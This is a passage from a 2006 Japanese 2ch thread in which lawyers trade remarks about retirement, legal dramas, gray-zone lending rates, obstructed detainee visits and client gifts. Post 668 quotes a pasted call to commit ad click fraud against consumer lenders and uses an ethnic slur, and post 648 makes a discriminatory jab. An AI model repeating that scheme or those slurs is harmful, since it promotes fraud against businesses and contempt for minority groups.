
600 :無責任な名無しさん:2006/04/13(木) 04:51:22 ID:aN2bnnGI
すみません。
ちょっと質問してもいいでしょうか。
もしご存知でしたら教えてください。

弁護士で自分で事務所を開いていたのですが、
例えば50歳くらいで病気になり事務所をたたみ
もちろん弁護士を辞めた場合、
その後の生活のお金について教えてほしいです。
自分の預貯金、何年か後の年金を除いて、
他に弁護士会か何かに所属していると、
そこからお金が出たりするんでしょうか。
弁護士だけの特権のようなお金をもらえる制度は
あるのでしょうか。
また、自分で事務所を開いている場合、
年収はどれほどになるものなのでしょうか。
ざっとでいいので教えて下さい。
もちろん私は弁護士でもなく知り合いにも弁護士がいません。
ちょっと事情があり、おたずねしています。
宜しくお願いします。


601 :無責任な名無しさん:2006/04/13(木) 07:19:45 ID:FOyYYCXY
弁護士会から一切金は出ません。
生活保護が頼りです。

年収は千差万別、下はマイナス(赤字)から上は無限大です。



602 :無責任な名無しさん:2006/04/13(木) 08:51:55 ID:yuYmi2UV
うちの父親は弁護士だったが、いつ働けなくなっても大丈夫
なようにたくさん保険に入っていた。
おれも弁護士になったが、年金は、上乗せふくめきちっと
入ってるし、家族用に保険もかなり入っているよ。


603 :無責任な名無しさん:2006/04/13(木) 09:20:20 ID:PT/MALi1
一人事務所で事務所をたたむ時って大変そう。
誰かに引き継がないといけないけど、急病・死亡でもない限り、そうそう
押しつけられない。費用の精算についても揉めそうだし。
結局、比較的早く回る国選をやりながら、長い事件をぼちぼち落としていく
しかないんだろうな。

604 :TN:2006/04/13(木) 10:58:15 ID:2/FR+qMN
>>603
そう大変でもないと思うよ
急に辞めるのは難しいけど少しずつ仕事を減らしていけばいいだけだからね
新件や客筋を若手にふっていけばいいし後輩も喜ぶだろう
後20年でリタイヤ予定だけど,60才過ぎたらそういう風に準備しかけようと思ってる


605 :無責任な名無しさん:2006/04/13(木) 12:35:27 ID:rkBT3zp7
>>603
引き継ぎ前提でイソ弁採用という手がある。
ある程度の期間はずっと共同受任にして,2〜3年したら一切合切全部引き継いでもらう。

606 :無責任な名無しさん:2006/04/13(木) 18:25:56 ID:Ctqep/b3
 あ〜、なんか仕事したくない病だなぁ。
 忙しいときより、ちょっと手が空いたときによくなる。そんなことを考える暇もないくらい働けばよいのかな。


607 :無責任な名無しさん:2006/04/13(木) 19:12:28 ID:WPQ5OaTN
肉食っとけ、肉。

608 :無責任な名無しさん:2006/04/13(木) 19:45:00 ID:6rUkUinW
春から新しい事務の女の子を入れた。
もーほんとに女の子。
弁護士に夢と希望と浪漫と正義を期待するな。

また弁護士ドラマが始まったらしい。
見てないが、それはドラマだ。


でも10年か20年やってれば
夢か希望か浪漫か正義かにぶつかるかもしれない。
ぶつかるといいな。


609 :無責任な名無しさん:2006/04/13(木) 19:47:54 ID:WPQ5OaTN
無理。
依頼者に夢も希望も浪漫も正義もないから。

610 :無責任な名無しさん:2006/04/13(木) 20:19:16 ID:H5C732tu
夢も希望も浪漫も正義もとりあえずはいらないから,休みが欲しい…。

611 :無責任な名無しさん:2006/04/13(木) 21:02:34 ID:q/Vi3tv8
【法曹関係者専用】7人の女弁護士
http://live22x.2ch.net/test/read.cgi/liveanb/1144929714/


612 :TN:2006/04/13(木) 21:33:48 ID:AsJ2Rt7K
今そのドラマみてるんだが、およそ弁護士に見えないのばかり
弁護士に見えそうなのは野際と柴田ぐらいか
特に柴田は同偏差値のルックスが結構いそう
釈、井上あたりはキャバクラ嬢のほうが似合ってる

横でうちの嫁が「釈由美子ってまた整形したんじゃない?」と言ってる

613 :無責任な名無しさん:2006/04/13(木) 21:48:14 ID:q/Vi3tv8
>>612
鼻が高くなってるよね。

井上和香風な裁判官ならいる。

614 :無責任な名無しさん:2006/04/13(木) 21:49:34 ID:q/Vi3tv8
原作を読むと,「弁護士のくず」のほうがおもしろそう。

615 :無責任な名無しさん:2006/04/13(木) 22:20:41 ID:VXmSwhQh
今月号の自由と正義のは、非弁がおおかった。

616 :無責任な名無しさん:2006/04/13(木) 22:26:29 ID:q/Vi3tv8
「弁護士のくず」のスポンサーにつくアコムの考えがわからない。


617 :無責任な名無しさん:2006/04/13(木) 23:24:41 ID:9DYVmBBI
>>616
サラ金問題をテーマにされないようにするためなんじゃないかな


618 :無責任な名無しさん:2006/04/13(木) 23:28:51 ID:dLwpQ2tG
今日はえらく弁護士もののドラマが多かったですね・・・。

619 :無責任な名無しさん:2006/04/13(木) 23:32:00 ID:L2Riw26C
ポケットバンクは安か

620 :無責任な名無しさん:2006/04/13(木) 23:42:43 ID:QZDzKqce
福岡の「しんわ」は,ほしのあきを使ってる。

621 :無責任な名無しさん:2006/04/14(金) 00:34:57 ID:01gJpXNy
NHKの「クローズアップ現代」、サラ金のグレーゾーン金利と過払金返還請求でしたね。

622 :無責任な名無しさん:2006/04/14(金) 00:42:15 ID:cchenaBx
弁護士のくず おもしろかったっす。
オレって九頭にちかいのかも…

623 :無責任な名無しさん:2006/04/14(金) 00:44:55 ID:cchenaBx
>>600
ふとおもったんだけど、弁護士と結婚しようと思っている人

624 :無責任な名無しさん:2006/04/14(金) 03:50:13 ID:ffQhLOa7
弁護士のくず
その時間NHKの水泳番組やってるので観れないな。

625 :無責任な名無しさん:2006/04/14(金) 08:46:18 ID:oYPwUNYc
金融庁、アイフル全店の業務停止命令へ・3―25日間
http://www.nikkei.co.jp/news/main/20060414AT2C1304V13042006.html

金融庁は13日、消費者金融大手アイフルに対し、強引な取り立てが相次いだことを理由に、
国内約1700のすべての営業店舗を対象に3―25日間の業務停止命令を出す方針を固めた。
消費者金融大手に対して全店を対象に業務停止を命じるのは初めてで、
異例の厳しい処分になる。消費者金融の規制強化の議論にも大きな影響を与えそうだ。

626 :無責任な名無しさん:2006/04/14(金) 10:45:21 ID:uc/+dJfb
>625
 過払い金返還請求に対する対応業務はどうなるのだろうと思ってしまった・・・

627 :無責任な名無しさん:2006/04/14(金) 14:53:50 ID:zKFFU5Uh
破産部の書記官にめちゃめちゃ怒られた。
「これだけの資料じゃわからん」とな。
でも,事情が特殊なので事前に問い合わせたら,「そんなに必要ない。とりあえずこれとこれだけで良い」って言ったの裁判所じゃん。
ちょっと腹立つ。

628 :無責任な名無しさん:2006/04/14(金) 15:25:45 ID:gJiCwrvY
>>627
上申書を書けば?

629 :無責任な名無しさん:2006/04/14(金) 15:53:02 ID:X4oO0uoJ
裁判所が言うとおりにしたのにん、実際に提出したらん
全然違うことを言ってん、山ほど補正させるなんて、
ひどいわひどいわ、ってか。

630 :無責任な名無しさん:2006/04/14(金) 16:50:47 ID:x0Pgw7Zn
>>622
みんなあれに近いよ。

631 :無責任な名無しさん:2006/04/14(金) 16:51:31 ID:x0Pgw7Zn
>>627
異動で人が変わったのでは?

632 :無責任な名無しさん:2006/04/14(金) 17:54:43 ID:jXAghjdR
>>627
酒飲んで人が変わったのでは

633 :無責任な名無しさん:2006/04/14(金) 17:57:00 ID:zKFFU5Uh
>>628
仰せのとおり,上申書起案中です。

>>629
仰せのとおり,泣き言です。

>>631
事前照会時の書記官名を尋ね損じたので(初歩的ミス),異動の有無は不明です。

ブツクサ言ってないで,さっさと仕事します。
泣き言に付き合っていただいて,ありがとうございました。

634 :無責任な名無しさん:2006/04/14(金) 19:13:33 ID:X4oO0uoJ
ガンガレ。

みんな、あんたのような経験をして、成長していくんだよ。

それでも、裁判所が、強権的なやり方をすると、すごく腹が立つこと
が今でもあるよ。

635 :無責任な名無しさん:2006/04/14(金) 19:44:43 ID:o2F0sF4x
櫻井稔「内部告発と公益通報−会社のためか、社会のためか」(中公新書)

こういう本をなぜ弁護士でない人間に執筆させるんだろうか?
口語化以前の民法709条の規定を引用するレベルの著者なのに・・

636 :無責任な名無しさん:2006/04/14(金) 20:15:31 ID:B+HVB2kO
・忙しい
・時間単価(執筆料)が高い
・文章がツマラナイ

637 :無責任な名無しさん:2006/04/14(金) 21:28:46 ID:k/6WOdz9
>>それでも、裁判所が、強権的なやり方をすると、すごく腹が立つこと
が今でもあるよ

まー、弁護士は、バカな書記官を相手にはホドホドがよいが。
私は、コイツは・・?!と思ったときには、時間を費やして、
その部の裁判官、支部長判事、所長宛に、事実関係を克明に書いた上申書・意見書・抗議書を提出してます。

小役人・官僚などには、文書に残すってのは結構ジャブになるようです。




638 :無責任な名無しさん:2006/04/14(金) 22:43:45 ID:o2F0sF4x
代用監獄問題のうまい解決法を思いついた!
警察署の留置場のままでいいから
身柄の利用時間を9時〜5時に限定すればいいじゃん!
接見時間は優遇の方向でw

639 :無責任な名無しさん:2006/04/14(金) 23:55:08 ID:s7tEYjaD
刑務所の留置場ってだけで問題なんだよ馬鹿が
ま、拘置所よりも近くで便利なわけだが

640 :無責任な名無しさん:2006/04/15(土) 00:09:11 ID:4DNpYOl/
都市の中心に拘置所をつくって、夜も接見できるようにしてくれれば良いんだよ

641 :無責任な名無しさん:2006/04/15(土) 00:17:14 ID:Obd0Gtcs
>>639-640
確かに理想は便利なところに拘置所設置なわけですが
現実的には無理なわけで・・

ごく現実的な解決策としては
留置場利用による警察の利便性を奪うことできれば代用監獄の問題は減るのではないかと
そこで取調べ可能な時間を9時〜5時に限定して、それ以降の取調べは認めない
そして5時以降の弁護人接見は基本的に認めると
そうすれば代用監獄問題の一部は解決するのではないかと

642 :無責任な名無しさん:2006/04/15(土) 01:22:52 ID:Svw1drwO
皇居潰して拘置所作ればいいんだよ

643 :無責任な名無しさん:2006/04/15(土) 02:28:57 ID:qav67xc1
 午後4時から判決言い渡し期日があり,その後東京地裁の仮監で接見を申し込んだら,屈強な刑務官に阻止された。
 私選の控訴事件で,こっちは新幹線で出張して来たんだから何とかしてくれといったのだが,断られた。

644 :無責任な名無しさん:2006/04/15(土) 03:14:22 ID:gow15W8n
弁護士には将来性がない!なんて言う人もいるけど
じゃあ何の職業なら将来性あるの?

645 :無責任な名無しさん:2006/04/15(土) 03:51:28 ID:4DNpYOl/
>>643
国賠請求してやればよいと思う。

646 :無責任な名無しさん:2006/04/15(土) 05:48:13 ID:cmsU03JL
西が丘分室に接見行った人います?

647 :無責任な名無しさん:2006/04/15(土) 10:11:18 ID:MzkOGL7x
>>644
知ってるけど教えない。

648 :無責任な名無しさん:2006/04/15(土) 10:29:47 ID:6RfsNmjY
同和なんか良いと思うよ

649 :無責任な名無しさん:2006/04/15(土) 13:56:11 ID:sKFBTfm1
http://up2.viploader.net/pic/src/viploader139295.jpg

650 :無責任な名無しさん:2006/04/15(土) 17:05:46 ID:deSH+Xhs
なんかおかしい。
http://www.vipper.org/vip235853.jpg

651 :無責任な名無しさん:2006/04/15(土) 17:36:54 ID:WvMZaGuT
弁護士過疎の解消法

東京・大阪の弁護士会の執行部と経験者を全員地方に送り込めばいい。

652 :無責任な名無しさん:2006/04/15(土) 17:46:41 ID:9EMPTB5s
>>645
同意。
国賠もんだな。

653 :無責任な名無しさん:2006/04/15(土) 17:52:04 ID:WvMZaGuT
>>643
せっかくだから国賠請求して判例作ったら?

654 :無責任な名無しさん:2006/04/15(土) 17:56:13 ID:ypaXLIGu
>>643
30年前とかならともかく、今でもそんな接見妨害あるのか。信じられない。

655 :無責任な名無しさん:2006/04/15(土) 21:10:46 ID:VAa3Mv67
>>643
どこの裁判所?

656 :無責任な名無しさん:2006/04/15(土) 21:43:10 ID:Ny69jIio
>>655
節穴?
>>643
>その後東京地裁の仮監で接見を申し込んだら

657 :無責任な名無しさん:2006/04/15(土) 23:03:47 ID:sYu0KbuG
>>643
それは国賠だな。
委員会に報告書を出したら勝手に弁護団を組んでくれるよ。

658 :無責任な名無しさん:2006/04/15(土) 23:26:54 ID:0zKzSOvd
>>647
おしえてよー

659 :無責任な名無しさん:2006/04/15(土) 23:51:36 ID:qav67xc1
>>643
 書いた本人です。
 接見妨害(国賠)のネタは2個もってるのだけど,自分が当事者だと,めんどくさいので,まだやってない。
 もう一つのネタは,第2次後藤国倍みたいな者です。
 刑務所長宛に,接見の4時間前に「これから被告人にビデオを見せるために接見する。ちなみに後藤国賠判例があるから送っておくので良く読め」と予告したら,接見拒絶(ビデオ再生装置持ち込みはゆるさん」と言われた。
 総務部長補方のやりとりは,了承を得て全部録音してある。日弁連に通報しようと思っているのだが・・・。面倒だ。
 委員会派遣で「弁護人となろうとする者です」と述べて接見を求めたら,「被疑者は接見したくない」と総務課の人間に言われた。しょうがないから,静岡の先生や京都の大先生に電話したのだが,事務員さんしかいなくて,「まぁ,がんばって」と言われた。
 この件は,接見委員会に通報したが,「変な判例を作られると困る。もちろん提訴するというのなら助力する」と言われた。

660 :無責任な名無しさん:2006/04/15(土) 23:56:45 ID:qav67xc1
 地方都市の地裁では,仮監の管理(鍵の開け閉め)は書記官がやっているのが普通なのだが。公判の前後にひと言いえば,合わせてくれるよね,普通。

661 :無責任な名無しさん:2006/04/15(土) 23:57:53 ID:sYu0KbuG
>>659
ちゃんと提訴しる。
遠方だろうが代理人要請あれば就任するから。名前だけ。

662 :無責任な名無しさん:2006/04/16(日) 00:02:09 ID:OlTyAMSr
「『被疑者は接見したくない』と述べている」総務課の人間に言われた。誤字脱字等が多くてスマソ。

663 :無責任な名無しさん:2006/04/16(日) 02:58:40 ID:0zUVV6nZ
漏れが前にいたところでは、よそから移住してきた市民運動家が、原発がらみで次々と行政訴訟、民事訴訟を起こし、ついには刑事訴訟を検察庁に起こされたw。
それはいいんだけど、すぐ弁護士と喧嘩して、代理人解任や弁護人解任を乱発した。
そのため2度目のタイーホのとき、地元の弁護士●名全員がこの市民運動家との接見を拒否した。
検事が「弁護士から接見拒否を次々くらうとは初めてだ」と目を白黒させていた。
勾留裁判官は「弁護士を付けるように裁判所も協力しろ」とこの市民運動家にねじ込まれたらしい。
ちなみに、当番弁護士の携帯電話は、なんぜか電波の届かないところに終始存在したw。

664 :無責任な名無しさん:2006/04/16(日) 09:04:25 ID:UP3hdyjl
>>663
単純な興味として、その後、その人はどうなったのか知りたいな。
ま、猶予で済んだとして、その後おとなしくなったの?

665 :無責任な名無しさん:2006/04/16(日) 11:13:36 ID:0iNliSIE
そういう輩がおとなしくなるとは思えないが・・・

666 :無責任な名無しさん:2006/04/16(日) 11:21:12 ID:m2buUQhn
>>643
つーか裁判所での接見は公判前にやれよ。
たいていのとこでは,裁判終わったらすぐ連れて帰るだろ

667 :無責任な名無しさん:2006/04/16(日) 11:23:39 ID:m2buUQhn
そういえば,SFCGの大島は,グレーゾーン問題に関して,
この問題で活動している弁護士の本音はグレーゾーン残すことだと思われる
等と書いていました。

ま,弁護士ってのも安い職業になってますな

668 :無責任な名無しさん:2006/04/16(日) 12:42:34 ID:m2buUQhn
:<丶`∀´>(´・ω・`)(`ハ´  )さん :2006/04/16(日) 06:43:50 ID:remj8hWG
■■■■■ 朝鮮金貸し屋に嫌がらせしよう ■■■■■ 

グーグルやヤフーで「キャッシング」で検索
      ↓
スポンサーの「アイフル」などのサラ金会社をクリック
      ↓
これだけで、サラ金会社は3517円、グーグルに支払うことになる


皆で一斉に何度もクリックしてしまえば、面白いことになるお。

日経ビジネス 2005.10.31号 33頁 から
キャッシング : 3517円
融資      : 2345円
探偵      : 1500円
プチ整形   : 622円

料金は若干変わってるかもしれんが3,000円だとしても
一人10回で3万円。
それを1万人で行えば3億円。
ヤフーで検索しても同じことができるみたい。

■■■■■ 1日3クリックで1万円の攻撃 ■■■■■ 

こんなのが貼ってあった。


669 :無責任な名無しさん:2006/04/16(日) 15:21:49 ID:UP3hdyjl
>>666
俺,私選の時はよく公判直後に接見に行くよ。
今日の公判の感じと検事の求刑からすると,だいたいこのくらいかな,とか話す。
これ以上なら公訴だが,このくらいなら公訴しない,といったことを確認する。
で,判決までこれでもう話すことはないから,後は祈るしかないですね,と言って帰る。
これをしておくと判決前に接見要請が来なくていいよ。時間の節約になる。


670 :TN:2006/04/16(日) 15:56:47 ID:RKGtYAaR
拘置所から来てるのはだいたい午前と午後に分けてまとめて送迎される
余程遅い時間の公判でもない限り公判直後に行けばスムーズに接見できる
これを頭に入れておけばトラブルが生じることはあまりないと思うんだが

671 :無責任な名無しさん:2006/04/16(日) 18:24:19 ID:0iNliSIE
田舎だとその日の公判が法廷1つだけなんてところも少なくなく、
そういうところでは開始直前に連れてきて終わり次第帰すのが通常の運用。

672 :無責任な名無しさん:2006/04/16(日) 18:32:40 ID:zMLM0XAt
そうですね。
帰りに車で裁判所の構内から出ようとするとき,
自分の車の前後に押送の車がいることがよくあるね。

673 :無責任な名無しさん:2006/04/16(日) 22:07:19 ID:FnGB9rIT
判決直後に法廷で、裁判官目前で、「これは、もしかすると減るかも知れんから控訴しなさい。」又は、「控訴してもダメだと思うが、よく考えて決めなさい」と言っている。

判決後に拘置所から呼出が来ることは、まず無い。

674 :無責任な名無しさん:2006/04/16(日) 22:27:15 ID:bg8+fZPf
>>673
前者を裁判官に聞こえるように言ってやりたいな。
でも,あとで判決文を書くときに理由をいろいろ補充されそう。

675 :無責任な名無しさん:2006/04/16(日) 22:36:51 ID:K96C2vEv
公判前の接見で量刑の見通し伝えるでしょ。
その見通しの範囲内なら,呼出しなんてこないよ。

676 :無責任な名無しさん:2006/04/16(日) 23:22:10 ID:OlTyAMSr
 「記者会見・訴状の配布で開国」って自由と正義の最新号誰か読んだか?

677 :無責任な名無しさん:2006/04/17(月) 12:49:09 ID:Kxsvr2BY
読みましたよ。
裁判所が公開する記録を、当事者代理人が公表したら開国なんだな。
しかも、相手方(懲戒請求者)作成の訴状だって。
自分で自分の名誉を傷つけることを書いていたということか。
よく分かりません。

変な訴訟が係属することを世間に訴えるということは、裁判の公開の精神、裁判所の監視という意義もあると思っていたが。

最近、理解困難な懲戒案件が混じってきている。
弁護士会官僚達が動かす機構に、常識的な運用・処理を図らせるため「裁判員」制度など検討してみてはどうかと。


678 :600:2006/04/17(月) 13:06:44 ID:JywQOlZN
遅くなりましたが、お返事をくれた方々
どうもありがとうございました。

679 :無責任な名無しさん:2006/04/17(月) 13:08:07 ID:ZKzIvybO
>>677
模擬裁判の負担がでかすぎるから嫌だ

680 :質問:2006/04/17(月) 13:26:31 ID:zvTk6vd2
調停が和解の方向に進んでもうすぐ終わりそうです。
あと少しでダメになりそうな自分を導いてくださって、
約半年間、たった一人私の味方になってくれた先生に感謝の言葉を送りたいのですが、
そういうの迷惑でしょうか?

迷惑でなければどんな言葉をもらうと嬉しいですか?

681 :無責任な名無しさん:2006/04/17(月) 15:48:39 ID:UoGFTpSx
>>677
いや、懲戒申出人を被告とする訴状を原告代理人が積極的に
マスコミに開示したっていう事案みたいよ。
よー分からんが、さっくり請求棄却となって、こんな証拠関係で
マスコミに大々的に発表するなっつうことになったんじゃないの。

>>680
俺なら嬉しいから、送ってあげたら。言葉は何でもいい。
お金もらうとき並みに嬉しいもんだよ、多分。
でも依頼者っていう関係以上に親密な感じだと引くな。


682 :無責任な名無しさん:2006/04/17(月) 16:19:06 ID:LhqWMkaH
これからは記者クラブに訴状やら答弁書やら回すの止めにしよう。
開国になった事例があるからすまない、と言って逃げよう。
裁判所が閲覧させる分には問題なしってことで、頑張って閲覧してもらおう。
今まで、どうせ閲覧してるんだしと思って、記事になるような集団訴訟事案では
訴状を渡したりしてきたけど、懲戒にかけられてはたまらない。

683 :無責任な名無しさん:2006/04/17(月) 18:31:07 ID:V2XTetGF
利息制限法引き上げですよ。

「グレーゾーン金利」政府が廃止の方針固める
http://www.tv-asahi.co.jp/ann/news/web/index7.html?now=20060417171729

684 :680:2006/04/17(月) 20:08:45 ID:zvTk6vd2
>>681先生
レスありがとうございます。
代理人の先生は私の父親と同じ位年令が離れた方なので、依頼者以上の気持ちはありませんが、
いくら感謝してもしきれないほどの気持ちがあります。
あとは支払いが終わるまでの短い期間、依頼人でいられますが
最後の日は泣いてしまって感謝の言葉も詰まりそうです。

今の内から何を言うか考えておこうと思います。

685 :無責任な名無しさん:2006/04/17(月) 20:56:42 ID:ztbNUBAt
アイフルの問題をきっかけに、政府は消費者金融への規制強化に踏みきります。現在、借
り手が支払う金利の上限は、利息制限法の20%と出資法の29.2%がありますが、多重債務
者が増える原因となっているこのグレーゾーン金利を廃止する方針です。金利の上限を20
%に引き下げる案が有力です。

 グレーゾーン金利廃止の準備に向けて、与謝野金融担当大臣は近く、金融庁と法務省に
協議に入るよう指示します。この問題では、消費者金融の多くがグレーゾーン金利で融資
することから、債務者の負担が重くなると指摘されています。先週末、消費者金融大手のアイ
フルが、違法な取り立てで、すべての店舗が業務停止になる行政処分を受けました。また
、最高裁がグレーゾーン金利を実質的に否定する判断を出していることから、政府はグレーゾーンを廃
止し、出資法の金利の上限を引き下げる方針です。一方で、一人当たりの融資額を制限する
案も浮上しています。

686 :無責任な名無しさん:2006/04/17(月) 21:10:36 ID:RQ++u6aV
>>680
 毎月,弁護士に(依頼人として)報酬の分割払いをするのか? 弁護士冥利に尽きるよねぇ。
 感謝の言葉も大事だが,それと同時に物(ブツ)をもっていくのも大事だぜ。
 弁護士さんが「甘い物好き」だったら「イチゴ」とか,「アルコールが好」きな様子だったら「一升瓶」とか。
 
 私は,依頼者から,一円の金ももらわなかったけれども心からの贈り物を壁に飾って大事に保存している。

687 :無責任な名無しさん:2006/04/17(月) 21:15:06 ID:kxM2rZ+C
せんせのパソコンの画面に、2ちゃんねるがあって、名前欄に「MS754」って入ってたら、
メロンを持っていくようにw

688 :無責任な名無しさん:2006/04/17(月) 21:28:43 ID:RQ++u6aV
>>680
 事務員さんにもお裾分けできるようなブツ(近くのデパ地下に売っているお菓子1ダースとかキャビア100グラムとか,これからの季節だと冷や麦とか)持
っていくとお人好しの弁護士は,涙をちょちょぎらせて喜ぶぞ。
 私は在日の依頼者から4ヶ月に一回くらい朝鮮人参酒をもろうている。


689 :無責任な名無しさん:2006/04/17(月) 21:38:36 ID:RQ++u6aV
 いわゆる「テキ屋」の私選弁護をしていて,親分から,「もうすぐ花
見で稼ぎ時なんだから,早く内の若い衆を罰金パイで出してやってくれ」と
言われていて,明日釈放の様子だ。「心ばかりの贈り物」でたこ焼き50
個や綿飴12ダースや射的「50発券」がくると困る。

690 :無責任な名無しさん:2006/04/17(月) 21:48:44 ID:RQ++u6aV
>>680
 流行っている弁護士だと,事件が落ちたとたんに依頼者の顔とか
残存報酬請求とか忘れることがあります。
 やはり「ブツ」です。甘い物好きの弁護士に依頼しているのなら,東京駅で売っている
ハローキティ人形焼きとか,「鱒の寿司」とか,「酒好き」ならコニャックとか・・・。

691 :無責任な名無しさん:2006/04/17(月) 21:51:47 ID:oaIaiUbf
物もらって当然って態度だね・・

692 :無責任な名無しさん:2006/04/17(月) 22:01:42 ID:RQ++u6aV
>>679
 漏れは模擬裁判の主任弁護人役(事前準備3日間,公判立会2日間)を
やったら持病(痔,不安神経症,風邪)が悪化した。
 「模擬裁判の弁護士役に一人あたり30万円のお手当を給付すべし」と
関係委員会が提案したら,執行部に否決された。

 もう二度と模擬祭も本物のの準備手続きもやりたくない。

693 :無責任な名無しさん:2006/04/17(月) 22:04:55 ID:RQ++u6aV
 各単位会の「裁判員模擬裁判」の実施状況はどんな様子なの
か,情報希望(季刊刑事弁護とかで結構書いてあるけど)。

694 :中坊お布施:2006/04/17(月) 22:10:25 ID:RQ++u6aV
>>691
 弁護士は「金」より「物」をもらったり,感謝の言葉を述べても
らった方がうれしい。金なんてもらい飽きていて,感動がない。

695 :無責任な名無しさん:2006/04/17(月) 23:20:39 ID:RQ++u6aV
 全然関係のない話だが,東京三会の弁護士さんは,東京地高簡裁判所(これって,
「正式名称とか通称は何というのだ? 霞ヶ関の裁判所だとか?」までどうやって
かようのが普通なのかい?
 漏れは,地元の裁判所まで歩くと15分・車でも(込んでいることが多いので)
15分なのだ。

696 :無責任な名無しさん:2006/04/17(月) 23:28:47 ID:+RtLCs7r
>>695

地下鉄!

697 :無責任な名無しさん:2006/04/17(月) 23:39:17 ID:RQ++u6aV
 駐車場(事務所の出退勤時往復と裁判所往復)は東京にはないのかい?
 漏れは地方弁護士だが,東京駅を降り立った後裁判所までタクシーで
1010円くらいだ。
 ところで,東京3会所属の弁護士は,「霞ヶ関にある東京地高簡裁」を何と呼
称しているのか? 地方の弁護士は,当該裁判所まで出張する折,身体検査をス
ルーするために弁護士バッヂを佩用している。

698 :無責任な名無しさん:2006/04/17(月) 23:47:13 ID:RQ++u6aV
>>667
 私は,金融業者に対して過払金返還交渉をする際は,事務員さんに仕事をほぼ任せている。
 もちろん最終的な書面のチェックは,弁護士である私がやっているのだが・・・。
 「訴訟で決着付けるならケツの毛までむしり取ってやる。年6%の利息まで請求してやる」と
述べた上「過払金返還請求書」をFAX送付する。「利息はカットして,過払金元本の5%引きを返還
します。当職の要求を飲まない限り,断固として訴訟を起こす」というと,だいたい交渉が妥結します。

699 :無責任な名無しさん:2006/04/17(月) 23:52:17 ID:RQ++u6aV
>>696
 地方都市在住の弁護士は,地下鉄はもちろんのこと,自宅と事務所・事務所と裁判所
間で公共交通を利用することはほとんどない。事務員さんは自転車を用いて裁判所に訴
状を出したり収入印紙を納めたり刑事事件の記録謄写をしたりする。

700 :無責任な名無しさん:2006/04/18(火) 00:15:18 ID:0DbcBk0C
 東京地高裁判所に赴いて法廷に行こうとすると建物のの端から端まで
200メートルくらいあり,「○○○号法廷」等の案内板がよく見えない。
 ずいぶん昔東京地裁に出張したら,原告が「大統領」という訴訟掲示板
があってビクーリした。廷吏さん(美人)に「この<大統領>って本当に原告の名前なんで
すか?<・・_>」との質問したら,「フフフ,裁判長に聴いてください」とはぐらかされた。

701 :MS754 ◆yGUnQdhyV2 :2006/04/18(火) 00:17:24 ID:RuEU41GA
>>687
よく覚えておられますね・・・・・。

702 :無責任な名無しさん:2006/04/18(火) 00:19:05 ID:seupu2QM
グレーゾーンなくなれば、仕事も減るな。

703 :無責任な名無しさん:2006/04/18(火) 00:21:03 ID:59Zm1Owp
>>697
裁判所

704 :無責任な名無しさん:2006/04/18(火) 00:25:47 ID:+lUmRJEg
>>703
裁判所というと、最高裁に連れて行かれることもあるので注意。
「霞ヶ関の裁判所」が良い。

705 :無責任な名無しさん:2006/04/18(火) 00:33:29 ID:uzbrZFfh
>>700
大統領さんは有名だよ。
東京地判平成14年5月21日判時1791号53頁で勝訴して、東京高判平14年10月31日判時1810号52頁で逆転敗訴してる。
そのほか、↓でも判決もらってる。
http://courtdomino2.courts.go.jp/kshanrei.nsf/webview/0829BF06F3F8D41749256DEB002DFD96/?OpenDocument

彼が、当事者の特定方法という論点について、民事訴訟法学とヤミ金対策に残した貢献は計り知れない。

706 :無責任な名無しさん:2006/04/18(火) 09:31:50 ID:Vr52hJdX
>>702
そうしたら片っ端から個人民事再生にするから同じだろ

707 :無責任な名無しさん:2006/04/18(火) 09:35:18 ID:sUeqPmCw
司法書士がおまんま食い上げだな

708 :無責任な名無しさん:2006/04/18(火) 10:05:53 ID:WTLdsRzX
呼称が個人の通称として社会的に定着しているといえるケースは,ジャンボ(尾崎将司)・ミスター(長島茂雄)・ゴジラ(松井秀喜)・
イチロー(鈴木一郎)・大魔神(佐々木一浩)・タモリ(森田一義)というような特別な場合しかあり得ず,一般的には考えられないとい
うべきである

709 :無責任な名無しさん:2006/04/18(火) 10:34:02 ID:+kvDMDlW
そうかい。

710 :無責任な名無しさん:2006/04/18(火) 11:31:28 ID:seupu2QM
過払い金返還訴訟で不当な利益をあげている司法書士やクレサラ弁護士は大打撃だな。
過払いは民事再生に比べてもかなり報酬いいからな。

711 :無責任な名無しさん:2006/04/18(火) 11:48:08 ID:6sfoGjPF
http://www.sfcg-ir.com/jp/contents/message.html
債務者側弁護士の本音はグレーゾーン維持w

712 :無責任な名無しさん:2006/04/18(火) 12:03:24 ID:AUqsRlG6
レベル低い弁護士が淘汰されていいだろ

713 :無責任な名無しさん:2006/04/18(火) 12:15:29 ID:U3Oc6x0F
レベルの低い貸金業者モナー

714 :無責任な名無しさん:2006/04/18(火) 13:35:16 ID:MKk9qe8C
>>697
裁判所又は東京地裁っていいます。
裁判所というと最高裁に連れて行かれる可能性があるから、後者でいうことが多いけど。



715 :無責任な名無しさん:2006/04/18(火) 13:46:37 ID:2dZWuhnv
>>697
当職も地方弁護士。しかし,しがない地方弁護士なので,東京駅から霞ヶ関までは丸ノ内線を使用する。

716 :無責任な名無しさん:2006/04/18(火) 17:08:55 ID:qs0Gn7SS
>>715
俺は有楽町から日比谷公園通って歩いて行ってるな。もっとしがないww
東京駅から地下鉄ならそんなに歩いてる距離変わらないんじゃない?

717 :TN:2006/04/18(火) 17:28:10 ID:2mCEtvp6
>>716
なかなかいいコースだね
今まで地下鉄だったけど、今度日弁連の委員会行くときそうしよう

718 :無責任な名無しさん:2006/04/18(火) 18:12:36 ID:iXMqBAbJ
東京だがの。
事務所から裁判所までタクシー。
裁判所から事務所までもタクシー。
歩いても15分か20分くらいなんじゃがな。

歩いているとタバコが吸いたくなるんじゃが
裁判所は東京都千代田区にあるんじゃ。
千代田区のバカ……


719 :不漁辯護士:2006/04/18(火) 22:01:53 ID:banBdIB6
 漏れは,東京地裁(高裁)の法廷棟では大便所でタバコを吸うことにしている。
 高校時代を思い出して懐かしゅうございます。
 日弁連では,各階に喫煙フロアがあるのに(特に刑事弁護系は喫煙率が高い)東京
地高裁は喫煙者の人権をないがしろにしておる。誰かひんしゅく覚悟で国賠起こせ。
 法廷棟でタバコを吸って(携帯灰皿持参)廷吏や事務官に制止されたら,国賠のネタになるはずだ。
 日弁連「環境と人権調整委員会」が必ずやバックアップするであろう。

720 :無責任な名無しさん:2006/04/18(火) 22:10:53 ID:1t0sTT2B
当該委員会がバックアップするのは相手方と思われ

721 :無責任な名無しさん:2006/04/18(火) 22:26:12 ID:59Zm1Owp
弁護士会館で吸えばいいがな

722 :不漁辯護士:2006/04/18(火) 22:33:43 ID:banBdIB6
